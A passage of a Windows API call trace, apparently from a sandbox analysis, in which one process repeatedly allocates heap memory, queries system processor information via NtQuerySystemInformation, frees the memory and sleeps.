ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0283.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.816] Sleep (dwMilliseconds=0x110) [0283.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0283.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0283.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0283.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0283.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0283.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0283.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0283.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0283.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.830] Sleep (dwMilliseconds=0x110) [0283.868] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0283.868] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.869] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0283.869] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0283.869] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.870] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0283.870] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0283.870] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.870] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0283.870] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0283.870] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.871] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0283.871] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.871] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.871] Sleep (dwMilliseconds=0x110) [0283.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0283.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0283.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0283.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0283.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0283.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0283.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0283.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0283.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.894] Sleep (dwMilliseconds=0x110) [0283.903] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0283.903] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0283.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0283.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0283.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0283.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0283.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0283.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0283.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.907] Sleep (dwMilliseconds=0x110) [0283.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0283.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0283.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0283.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0283.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0283.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0283.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0283.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0283.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.927] Sleep (dwMilliseconds=0x110) [0283.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0283.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0283.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0283.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0283.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0283.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0283.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0283.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0283.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.941] Sleep (dwMilliseconds=0x110) [0283.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0283.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0283.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0283.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0283.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0283.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0283.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0283.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0283.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.958] Sleep (dwMilliseconds=0x110) [0283.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0283.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0283.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0283.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0283.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0283.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0283.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0283.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0283.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.970] Sleep (dwMilliseconds=0x110) [0283.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0283.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0283.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0283.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0283.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0283.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0283.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0283.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0283.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0283.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0283.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0283.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0283.985] Sleep (dwMilliseconds=0x110) [0284.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0284.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0284.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0284.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0284.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0284.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0284.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0284.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0284.009] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.009] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.009] Sleep (dwMilliseconds=0x110) [0284.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0284.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0284.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0284.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0284.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0284.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0284.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0284.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0284.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.021] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.021] Sleep (dwMilliseconds=0x110) [0284.028] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0284.028] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0284.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0284.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0284.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0284.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0284.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0284.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0284.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.035] Sleep (dwMilliseconds=0x110) [0284.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0284.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0284.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0284.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0284.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0284.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0284.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0284.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0284.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0284.052] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0284.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0284.052] Sleep (dwMilliseconds=0x110) [0284.059] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0284.059] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.060] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0284.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0284.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0284.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0284.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0284.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0284.067] 